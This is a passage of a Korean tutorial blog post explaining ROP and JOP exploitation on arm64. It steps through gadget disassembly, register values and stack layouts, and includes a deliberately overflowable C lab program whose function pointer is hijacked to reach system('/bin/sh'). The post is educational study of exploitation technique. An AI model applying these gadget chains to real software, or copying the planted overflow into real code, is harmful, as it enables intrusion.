https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc14-768x554.png 768w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc14-1536x1108.png 1536w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc14-2048x1478.png 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<div class=\"wp-block-group\"><div class=\"wp-block-group__inner-container is-layout-constrained wp-block-group-is-layout-constrained\">\n<p>\uc544\ub798 \uba85\ub839\uc5b4\ub4e4\uc744 \uc218\ud589\ud574\ubcf4\uba74 \uc758\ubbf8\ub294 \ub2e4\uc74c\uacfc \uac19\ub2e4.<\/p>\n\n\n\n<p><strong>ldr x19, [sp, #16]<\/strong><br>sp\uc5d0\uc11c +16\ubc14\uc774\ud2b8\ub9cc\ud07c \ub5a8\uc5b4\uc9c4 \uc704\uce58\uc5d0 \uc788\ub294 0x450d10 \uc8fc\uc18c\uc5d0 \uc788\ub294 \uac12\uc744 \uc77d\uc5b4\uc640\uc11c x19 \ub808\uc9c0\uc2a4\ud130\uc5d0 \uc800\uc7a5\ud55c\ub2e4.<\/p>\n\n\n\n<p><strong>ldp x29, x30, [sp], #48<\/strong><br>\ud504\ub808\uc784 \ud3ec\uc778\ud130 (<code>x29<\/code>)\ub97c \ub9c1\ud06c \ub808\uc9c0\uc2a4\ud130 (<code>x30<\/code>(= lr)) \uac12\uc744 (\ucd5c\uadfc) sp+0, sp+8\uc9c0\uc810\uc73c\ub85c\ubd80\ud130 \ub85c\ub4dc\ud558\uae30 \ub54c\ubb38\uc5d0<br>x29 \ub808\uc9c0\uc2a4\ud130\uac12\uc740 0xffffffffffffffff, x30 (= lr) \ub808\uc9c0\uc2a4\ud130\uac12\uc740 0x44f080\uc774 \ub41c\ub2e4.<br>\uadf8 \ub2e4\uc74c, \uc2a4\ud0dd \ud3ec\uc778\ud130 sp\ub97c +48\ub9cc\ud07c \uc99d\uac00\uc2dc\ud0a8\ub2e4<\/p>\n\n\n\n<p>0x44f02f \uac00\uc82f\uc774 \uc2e4\ud589\ub418\uace0 \ub09c \ub4a4 (ret \uc218\ud589 \uc804) \uc758 \uc2a4\ud0dd \uad6c\uc870\ub294 \ub2e4\uc74c\uacfc \uac19\ub2e4.<\/p>\n<\/div><\/div>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"739\" src=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc15-1-1024x739.png\" alt=\"\" class=\"wp-image-2625\" srcset=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc15-1-1024x739.png 1024w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc15-1-300x216.png 300w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc15-1-768x554.png 768w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc15-1-1536x1108.png 1536w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc15-1-2048x1478.png 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>ret\uc774 \uc218\ud589\ub418\uace0 \ub09c\ub4a4\uc5d0\ub294 \uc774\uc81c pc \ub808\uc9c0\uc2a4\ud130\uac12\uc774 0x44f080\uac00 \ub420 \uac83\uc774\ub2e4.<br>0x44f080 \uc8fc\uc18c\uc5d0 \uc788\ub294 \uac00\uc82f\ub3c4 \uc0b4\ud3b4\ubcf4\uba74,,<\/p>\n\n\n\n<div class=\"wp-block-group\"><div class=\"wp-block-group__inner-container is-layout-constrained wp-block-group-is-layout-constrained\">\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"c\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">0x000000000044f080 &lt;+304>:\tmov\tx0, x19\n0x000000000044f084 &lt;+308>:\tldr\tx19, [sp, #16]\n0x000000000044f088 &lt;+312>:\tldp\tx29, x30, [sp], #48\n0x000000000044f08c &lt;+316>:\tret<\/pre>\n<\/div><\/div>\n\n\n\n<p>0x44f02f \uac00\uc82f\uc774 \uc2e4\ud589\ub418\uace0 \ub09c \ub4a4 (ret \uc218\ud589 \uc804) \uc758 \uc2a4\ud0dd \uad6c\uc870\ub294 \ub2e4\uc74c\uacfc \uac19\ub2e4.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"739\" src=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc16-1024x739.png\" alt=\"\" class=\"wp-image-2626\" srcset=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc16-1024x739.png 1024w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc16-300x216.png 300w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc16-768x554.png 768w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc16-1536x1108.png 1536w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc16-2048x1478.png 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p><strong>mov x0, x19<\/strong><br>x19 \ub808\uc9c0\uc2a4\ud130\uac12\uc774 x0 \ub808\uc9c0\uc2a4\ud130\ub85c \ubcf5\uc0ac\ub41c\ub2e4.<br>\ub530\ub77c\uc11c x0 \ub808\uc9c0\uc2a4\ud130\uac12\uc740 &#8220;\/bin\/sh&#8221; \ubb38\uc790\uc5f4 \uc8fc\uc18c\ub97c \uac00\uc9c0\uac8c \ub41c\ub2e4.<\/p>\n\n\n\n<p><strong>ldr x19, [sp, #16]<\/strong><br>(\ucd5c\uadfc) sp\uc5d0\uc11c +16\ubc14\uc774\ud2b8\ub9cc\ud07c \ub5a8\uc5b4\uc9c4 \uc704\uce58\uc5d0 \uc788\ub294 0x7ffffff340 \uc8fc\uc18c\uc5d0 \uc788\ub294 \uac12\uc744 \uc77d\uc5b4\uc640\uc11c x19 \ub808\uc9c0\uc2a4\ud130\uc5d0 \uc800\uc7a5\ud55c\ub2e4.<br>\ub530\ub77c\uc11c x19 \ub808\uc9c0\uc2a4\ud130\uac12\uc740 0xffffffffffffffff\uac00 \ub41c\ub2e4.<\/p>\n\n\n\n<p><strong>ldp x29, x30, [sp], #48<\/strong><br>\ud504\ub808\uc784 \ud3ec\uc778\ud130 (<code>x29<\/code>)\ub97c \ub9c1\ud06c \ub808\uc9c0\uc2a4\ud130 (<code>x30<\/code>(= lr)) \uac12\uc744 (\ucd5c\uadfc) sp+0, sp+8\uc9c0\uc810\uc73c\ub85c\ubd80\ud130 \ub85c\ub4dc\ud558\uae30 \ub54c\ubb38\uc5d0<br>x29 \ub808\uc9c0\uc2a4\ud130\uac12\uc740 0xffffffffffffffff, x30 (= lr) \ub808\uc9c0\uc2a4\ud130\uac12\uc740 0x406ae8\uc774 \ub41c\ub2e4.<br>\uadf8 \ub2e4\uc74c, \uc2a4\ud0dd \ud3ec\uc778\ud130 sp\ub97c +48\ub9cc\ud07c \uc99d\uac00\uc2dc\ud0a8\ub2e4.<\/p>\n\n\n\n<p>\uc5ec\uae30\uae4c\uc9c0 \uc218\ud589\ud55c \ud6c4, ret\uc744 \uc218\ud589\ud558\uba74 <br>LR \ub808\uc9c0\uc2a4\ud130 \uac12\uc740 \uace7 pc \ub808\uc9c0\uc2a4\ud130\uac12\uc774 \ub418\uba70, LR \uac12\uc740 0x406ae8\uc778 system \ud568\uc218 \uc8fc\uc18c, <br>x0 \ub808\uc9c0\uc2a4\ud130\uac12\uc740 &#8220;\/bin\/sh&#8221; \ubb38\uc790\uc5f4 \uc8fc\uc18c\ub97c \uac00\uc9c0\uac8c \ub418\ubbc0\ub85c,<br>system(&#8220;\/bin\/sh&#8221;) \ud568\uc218\uac00 \ud638\ucd9c\ub418\uba74\uc11c \uc258\uc774 \ub530\uc9c0\uac8c \ub418\ub294 \uac83\uc774\ub2e4.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h1 class=\"wp-block-heading\">JOP<\/h1>\n\n\n\n<p><strong>jop.c<\/strong><\/p>\n\n\n\n<div class=\"wp-block-group\"><div class=\"wp-block-group__inner-container is-layout-constrained wp-block-group-is-layout-constrained\">\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"c\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">#include &lt;stdio.h>\n#include &lt;fcntl.h>\n#include &lt;unistd.h>\n#include &lt;stdlib.h>\n\ntypedef void (*jop_func_t)(); \n\nvoid jop_symbol()\n{\n\tsystem(\"\/bin\/ls\");\n}\n\nvoid jop_bad_func()\n{\n\tjop_func_t func = NULL;\n\tchar data[16] = {0}; \n\tunsigned long long u64 = 0; \n\tint fd = 0; \n\n\tfd = open(\".\/jop.data\",O_RDONLY); \n\tfunc = jop_symbol;\n\tread(fd,&amp;u64,512);\n\tfunc();\n}\n\nint main()\n{\n\tjop_bad_func();\n\treturn 0;\n}<\/pre>\n<\/div><\/div>\n\n\n\n<p>IDA\uc5d0\uc11c \ub514\ucef4\ud30c\uc77c\uc2dc\ucf1c \uc2a4\ud0dd \uc624\ud504\uc14b\uc744 \ud655\uc778\ud574\ubcf4\uba74 \uc544\ub798\uc640 \uac19\uace0,<\/p>\n\n\n\n<div class=\"wp-block-group\"><div class=\"wp-block-group__inner-container is-layout-constrained wp-block-group-is-layout-constrained\">\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"c\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">void __cdecl jop_bad_func()\n{\n  unsigned __int64 u64; \/\/ [xsp+18h] [xbp+18h] BYREF\n  unsigned __int8 data[16]; \/\/ [xsp+20h] [xbp+20h] BYREF\n  int fd; \/\/ [xsp+34h] [xbp+34h]\n  jop_func_t func; \/\/ [xsp+38h] [xbp+38h]\n...<\/pre>\n<\/div><\/div>\n\n\n\n<p>jop.data \ud30c\uc77c \ub0b4\uc6a9\uc73c\ub85c \ubc84\ud37c \uc624\ubc84\ud50c\ub85c\uc6b0\ub97c \ubc1c\uc0dd\uc2dc\ud0a4\uba74 <br>\uc2a4\ud0dd \ub0b4\uc6a9\uc740 \uc544\ub798\uc640 \uac19\uc774 \ubcc0\ud558\uac8c \ub41c\ub2e4.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"699\" src=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/06\/\uadf8\ub9bc17-1-1024x699.png\" alt=\"\" class=\"wp-image-2633\" srcset=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/06\/\uadf8\ub9bc17-1-1024x699.png 1024w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/06\/\uadf8\ub9bc17-1-300x205.png 300w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/06\/\uadf8\ub9bc17-1-768x524.png 768w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/06\/\uadf8\ub9bc17-1-1536x1048.png 1536w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/06\/\uadf8\ub9bc17-1-2048x1397.png 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\ubcf4\ub2e4\uc2dc\ud53c func \uc8fc\uc18c\uc5d0 \uc788\ub358 \uc790\ub9ac\uac00 0x441d84\uac12\uc73c\ub85c \ub36e\uc5b4\uc4f0\uc774\uac8c \ub418\uba74\uc11c,<br>\uc774\uc81c func() \ud568\uc218\ub97c \ud638\ucd9c\ud558\ub824\uace0 \ud558\uba74, 0x441d84 \uac00\uc82f \ucf54\ub4dc\uac00 \uc2e4\ud589\ub41c\ub2e4.<\/p>\n\n\n\n<p>\ucf54\ub4dc\ub294 \uc544\ub798\uc640 \uac19\ub2e4.<\/p>\n\n\n\n<div class=\"wp-block-group\"><div class=\"wp-block-group__inner-container is-layout-constrained wp-block-group-is-layout-constrained\">\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"asm\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">0x0000000000441d84 &lt;+260>:\tldp\tx0, x1, [x29, #48]\n0x0000000000441d88 &lt;+264>:\tldp\td0, d1, [x29, #64]\n0x0000000000441d8c &lt;+268>:\tldp\td2, d3, [x29, #80]\n0x0000000000441d90 &lt;+272>:\tldr\tx30, [x29, #232]\n0x0000000000441d94 &lt;+276>:\tmov\tsp, x29\n0x0000000000441d98 &lt;+280>:\tldr\tx29, [x29]\n0x0000000000441d9c &lt;+284>:\tadd\tsp, sp, #0x100\n0x0000000000441da0 &lt;+288>:\tbr\tx30<\/pre>\n<\/div><\/div>\n\n\n\n<p>\uc704 \uba85\ub839\uc5b4\ub4e4\uc744 \uc218\ud589\ud588\uc744\ub54c\ub97c \uc2a4\ud0dd\uacfc \uac19\uc774 \uadf8\ub9bc\uc73c\ub85c \uc124\uba85\ud558\uba74 \uc544\ub798\uc640 \uac19\ub2e4.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"600\" src=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/06\/\uadf8\ub9bc18-1-1024x600.png\" alt=\"\" class=\"wp-image-2635\" srcset=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/06\/\uadf8\ub9bc18-1-1024x600.png 1024w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/06\/\uadf8\ub9bc18-1-300x176.png 300w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/06\/\uadf8\ub9bc18-1-768x450.png 768w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/06\/\uadf8\ub9bc18-1-1536x900.png 1536w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/06\/\uadf8\ub9bc18-1-2048x1200.png 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p><strong>0x0000000000441d84 &lt;+260&gt;: ldp x0, x1, [x29, #48]<\/strong><br>\uac01\uac01 <br><strong>x0 \ub808\uc9c0\uc2a4\ud130\ub294 x29+48 \uc9c0\uc810\uc73c\ub85c\ubd80\ud130 \ub85c\ub4dc\ud558\uae30 \ub54c\ubb38\uc5d0 system \ud568\uc218 \uc8fc\uc18c,<\/strong><br>x1 \ub808\uc9c0\uc2a4\ud130\ub294 x29+56 \uc9c0\uc810\uc73c\ub85c\ubd80\ud130 \ub85c\ub4dc\ud558\uae30 \ub54c\ubb38\uc5d0 0x441d84 \uac12\uc774 \ub41c\ub2e4.<\/p>\n\n\n\n<p><strong>0x0000000000441d88 &lt;+264&gt;: ldp d0, d1, [x29, #64]<br>0x0000000000441d8c &lt;+268&gt;: ldp d2, d3, [x29, #80]<\/strong><br>d0, d1, d2&#8230; \ub808\uc9c0\uc2a4\ud130\ub294 \ubca1\ud130 \ubc0f \ubd80\ub3d9 \uc18c\uc218\uc810 \uc5f0\uc0b0\ud558\ub294\ub370 \uc0ac\uc6a9\ub418\ubbc0\ub85c \ubb34\uc2dc\ud55c\ub2e4.<\/p>\n\n\n\n<p><strong>0x0000000000441d90 &lt;+272&gt;: ldr x30, [x29, #232]<\/strong><br>x30 \ub808\uc9c0\uc2a4\ud130\uac00 x29+232 \uc9c0\uc810\uc73c\ub85c\ubd80\ud130 \ub85c\ub4dc\ud558\uae30 \ub54c\ubb38\uc5d0 <strong><br>x30 \ub808\uc9c0\uc2a4\ud130\ub294 0x441cf4 \uac00\uc82f \uc8fc\uc18c\ub97c \uac00\uc9c4\ub2e4.<\/strong><\/p>\n\n\n\n<p><strong>0x0000000000441d94 &lt;+276&gt;: mov sp, x29<\/strong><br>\uc774\ubbf8 sp\uc640 x29\uac12\uc774 \uac19\uae30 \ub54c\ubb38\uc5d0 \ubb34\uc2dc\ud55c\ub2e4.<\/p>\n\n\n\n<p><strong>0x0000000000441d98 &lt;+280&gt;: ldr x29, [x29]<\/strong><br>x29 \ub808\uc9c0\uc2a4\ud130\ub294 \ub85c\ub4dc\uc2dc\ucf1c \uc774\uc81c x29 \uc8fc\uc18c\uc5d0 \uc788\ub294 \uac12\uc744 \uac00\uc9c0\uac8c \ub418\uc5b4<br>main() \ud504\ub808\uc784 \ud3ec\uc778\ud130 \uc8fc\uc18c\uac12\uc778 0x7ffffff2f0\uc774 \ub41c\ub2e4.<\/p>\n\n\n\n<p><strong>0x0000000000441d9c &lt;+284&gt;: add sp, sp, #0x100<\/strong><br>sp \uc2a4\ud0dd \ud504\uc778\ud130\uac00 0x100\ub9cc\ud07c \uc99d\uac00\ud55c\ub2e4.<\/p>\n\n\n\n<p><strong>0x0000000000441da0 &lt;+288&gt;: br x30<\/strong><br>BR\uc740 Branch\ub85c, BL\/BLR \uba85\ub839\uc5b4\uc640 \ub2ec\ub9ac \ud568\uc218\uac00 \ub05d\ub098\uace0 \ubcf5\uadc0\ud558\uc9c0 \uc54a\ub294\ub2e4. <br>x86_64 \uc544\ud0a4\ud14d\ucc98\uc758 jmp \uba85\ub839\uc5b4\uc640 \ube44\uc2b7\ud558\ub2e4\uace0 \ubcf4\uba74 \ub41c\ub2e4.<br><strong>\ub530\ub77c\uc11c, pc\ub294 x30 \ub808\uc9c0\uc2a4\ud130 \uac12\uc778 0x441cf4 \uac00\uc82f\uc73c\ub85c \ubd84\uae30\ub41c\ub2e4.<\/strong><\/p>\n\n\n\n<p>\ubd84\uae30\ub41c \ud6c4, \uc2e4\ud589\ub420 0x441cf4 \uac00\uc82f\uc744 \ud55c\ubc88 \uc0b4\ud3b4\ubcf4\uc790.<\/p>\n\n\n\n<div class=\"wp-block-group\"><div class=\"wp-block-group__inner-container is-layout-constrained wp-block-group-is-layout-constrained\">\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"asm\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">0x0000000000441cf4 &lt;+116>:\tmov\tx16, x0\n0x0000000000441cf8 &lt;+120>:\tldp\tx0, x1, [x29, #96]\n0x0000000000441cfc &lt;+124>:\tldp\tx2, x3, [x29, #112]\n0x0000000000441d00 &lt;+128>:\tldp\tx4, x5, [x29, #128]\n0x0000000000441d04 &lt;+132>:\tldp\tx6, x7, [x29, #144]\n0x0000000000441d08 &lt;+136>:\tldp\td0, d1, [x29, #160]\n0x0000000000441d0c &lt;+140>:\tldp\td2, d3, [x29, #176]\n0x0000000000441d10 &lt;+144>:\tldp\td4, d5, [x29, #192]\n0x0000000000441d14 &lt;+148>:\tldp\td6, d7, [x29, #208]\n0x0000000000441d18 &lt;+152>:\tldp\tx29, x30, [x29]\n0x0000000000441d1c &lt;+156>:\tadd\tsp, sp, #0x100\n0x0000000000441d20 &lt;+160>:\tbr\tx16<\/pre>\n<\/div><\/div>\n\n\n\n<p>\uc704 \uba85\ub839\uc5b4\ub4e4\uc744 \uc218\ud589\ud588\uc744\ub54c\ub97c \uc2a4\ud0dd\uacfc \uac19\uc774 \uadf8\ub9bc\uc73c\ub85c \uc911\uc694\ud55c \ubd80\ubd84\ub9cc \ub098\ud0c0\ub0b4\uba74 \uc544\ub798\uc640 \uac19\ub2e4.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"712\" src=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/06\/\uadf8\ub9bc19-1024x712.png\" alt=\"\" class=\"wp-image-2636\" srcset=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/06\/\uadf8\ub9bc19-1024x712.png 1024w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/06\/\uadf8\ub9bc19-300x209.png 300w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/06\/\uadf8\ub9bc19-768x534.png 768w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/06\/\uadf8\ub9bc19-1536x1068.png 1536w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/06\/\uadf8\ub9bc19-2048x1424.png 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\uc911\uc694\ud55c \ubd80\ubd84\ub9cc \uc124\uba85\ud558\uc790\uba74,<\/p>\n\n\n\n<p><strong>0x0000000000441cf4 &lt;+116&gt;: mov x16, x0<\/strong><br>x0 \ub808\uc9c0\uc2a4\ud130\ub85c\ubd80\ud130 \ubcf5\uc0ac\ubc1b\uae30 \ub54c\ubb38\uc5d0<br><strong>x16 \ub808\uc9c0\uc2a4\ud130\uac12\uc740 system \ud568\uc218 \uc8fc\uc18c\ub97c \uac00\uc9c4\ub2e4.<\/strong><\/p>\n\n\n\n<p><strong>0x0000000000441cf8 &lt;+120&gt;: ldp x0, x1, [x29, #96]<\/strong><br>x29+96 \uc9c0\uc810\uc73c\ub85c\ubd80\ud130 \ub85c\ub4dc\uc2dc\ud0a4\uae30 \ub54c\ubb38\uc5d0 <br><strong>x0 \ub808\uc9c0\uc2a4\ud130\uac12\uc774 &#8220;\/bin\/sh&#8221; \ubb38\uc790\uc5f4 \uc8fc\uc18c\ub97c \uac00\uc9c0\uac8c \ub41c\ub2e4.<\/strong><\/p>\n\n\n\n<p>\ub098\uba38\uc9c0\ub294 \ud06c\uac8c \uc2e0\uacbd \uc548\uc368\ub3c4 \ub418\uace0,<\/p>\n\n\n\n<p><strong>0x0000000000441d20 &lt;+160&gt;: br x16<\/strong><br>\uc774\uc81c x16 \ub808\uc9c0\uc2a4\ud130\uc5d0 \uc788\ub358 system \ud568\uc218 \uc8fc\uc18c\ub85c \ubd84\uae30\ub418\uae30 \ub418\ubbc0\ub85c,<br>\ucd5c\uc885\uc801\uc73c\ub85c system(&#8220;\/bin\/sh&#8221;) \ud568\uc218\uac00 \ud638\ucd9c\ub418\ub294 \uac83\uc774\ub2e4.<\/p>\n\n\n\n<p><\/p>\n","protected":false},"excerpt":{"rendered":"<p>\uc774\ubc88 \uc2dc\uac04\uc5d0\ub294 rop, jop \uacf5\uaca9\uc744 \uc774\ud574\ud558\uae30 \uc704\ud574 \uc544\ub798 \ud504\ub85c\uc81d\ud2b8\ub97c \ud65c\uc6a9\ud558\uc5ec \uc9c1\uc811 \ub514\ubc84\uae45\ud558\uba74\uc11c \uc2a4\ud0dd \ud504\ub808\uc784\uc774 \uc0dd\uaca8\uc9c0\ub294 \uacfc\uc815\uacfc \uac01 \uba85\ub839\uc5b4 \uc758\ubbf8, \uac01 \ubc94\uc6a9 \ub808\uc9c0\uc2a4\ud130\ub4e4\uc774 \uc5b4\ub5bb\uac8c \ud65c\uc6a9\ub418\ub294\uc9c0 \uc54c\uc544\ubcfc \uac83\uc774\ub2e4. https:\/\/github.com\/geesun\/arm64_rop_jop ROP 1. \uc2a4\ud0dd \ud504\ub808\uc784 \ud615\uc131 \ubc0f \uac01 \uba85\ub839\uc5b4 \uc218\ud589 \uacfc\uc815 \uc774\ud574\ud558\uae30 main \ucf54\ub4dc \uc5b4\uc148\ube14\ub7ec \uc124\uba85 x29 \ub808\uc9c0\uc2a4\ud130\ud504\ub808\uc784 \ud3ec\uc778\ud130 \ub808\uc9c0\uc2a4\ud130\ub85c, \uc2a4\ud0dd \ud504\ub808\uc784\uc744 \ucd94\uc801\ud560 \ub54c \uc0ac\uc6a9\ub41c\ub2e4.\ud568\uc218\uac00 \ud638\ucd9c\ub418\uc5b4 \uc0c8\ub85c\uc6b4 \uc2a4\ud0dd \ud504\ub808\uc784\uc774&hellip;&nbsp;<a href=\"https:\/\/h4ck.kr\/?p=2558\" rel=\"bookmark\">\ub354 \ubcf4\uae30 &raquo;<span class=\"screen-reader-text\">arm64 \ud658\uacbd\uc5d0\uc11c rop, jop \uacf5\uaca9 \uc774\ud574\ud558\uae30<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"neve_meta_sidebar":"","neve_meta_container":"","neve_meta_enable_content_width":"","neve_meta_content_width":0,"neve_meta_title_alignment":"","neve_meta_author_avatar":"","neve_post_elements_order":"","neve_meta_disable_header":"","neve_meta_disable_footer":"","neve_meta_disable_title":"","footnotes":""},"categories":[1],"tags":[],"class_list":["post-2558","post","type-post","status-publish","format-standard","hentry","category-uncategorized"],"_links":{"self":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/2558","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2558"}],"version-history":[{"count":28,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/2558\/revisions"}],"predecessor-version":[{"id":2662,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/2558\/revisions\/2662"}],"wp:attachment":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2558"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2558"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2558"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}